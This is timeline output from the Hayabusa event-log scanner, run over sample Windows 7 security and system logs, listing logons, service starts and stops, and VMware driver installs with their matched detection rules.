2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf598 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:36:37.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:21.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27008 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27038 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:50:17.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:19.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12048 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12070 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 08:03:47.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:34:56.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x131c3 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x13216 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:42:44.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:43:34.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36aed | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36b1d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:16:14.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:05.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c02 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c32 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:30:40.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:47.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x170f5 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x17125 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:23:13.147 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: TP AutoConnect Service | Path: ""C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:13.240 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: TP VC Gateway Service | Path: ""C:\Program Files\VMware\VMware Tools\TPVCGateway.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:19.075 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware VMCI Bus Driver | Path: system32\DRIVERS\vmci.sys | Account:  | Start Type: boot start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:30.884 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Memory Module Driver | Path: system32\DRIVERS\pnpmem.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:31.757 +09:00,IE10Win7,7045,info,,New Service Installed,Name: vSockets Driver | Path: C:\Windows\system32\drivers\vsock.sys | Account:  | Start Type: boot start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:33.349 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware Host Guest Client Redirector | Path: system32\drivers\vmhgfs.sys | Account:  | Start Type: system start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:11.865 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft 1.1 UAA Function Driver for High Definition Audio Service | Path: system32\drivers\HdAudio.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:17.909 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Streaming Clock Proxy | Path: system32\drivers\MSPCLOCK.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:18.237 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Streaming Quality Manager Proxy | Path: system32\drivers\MSPQM.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:19.969 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Streaming Service Proxy | Path: system32\drivers\MSKSSRV.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:20.281 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Streaming Tee/Sink-to-Sink Converter | Path: system32\drivers\MSTEE.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:20.452 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware USB Pointing Device | Path: system32\DRIVERS\vmusbmouse.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:23.245 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Microsoft Trusted Audio Drivers | Path: system32\drivers\drmkaud.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:30.249 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Radio USB Driver | Path: System32\Drivers\BTHUSB.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:31.310 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Port Driver | Path: System32\Drivers\BTHport.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:33.925 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Request Block Driver | Path: system32\DRIVERS\BthEnum.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:34.362 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Device (RFCOMM Protocol TDI) | Path: system32\DRIVERS\rfcomm.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:36.015 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Bluetooth Device (Personal Area Network) | Path: system32\DRIVERS\bthpan.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:38.153 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware Pointing Device | Path: system32\DRIVERS\vmmouse.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:38.823 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Memory Control Driver | Path: C:\Program Files\Common Files\VMware\Drivers\memctl\vmmemctl.sys | Account:  | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:39.011 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware Vista Physical Disk Helper | Path: C:\Program Files\VMware\VMware Tools\vmrawdsk.sys | Account:  | Start Type: system start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:41.647 +09:00,IE10Win7,7045,info,,New Service Installed,Name: vm3dmp | Path: system32\DRIVERS\vm3dmp.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:44.783 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: VMware Tools | Path: ""C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:53.788 +09:00,IE10Win7,7045,info,,New Service Installed,Name: VMware Snapshot Provider | Path: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Account: NT AUTHORITY\LocalService | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:05.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:53.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ac86 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b245 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:26:42.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:10.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
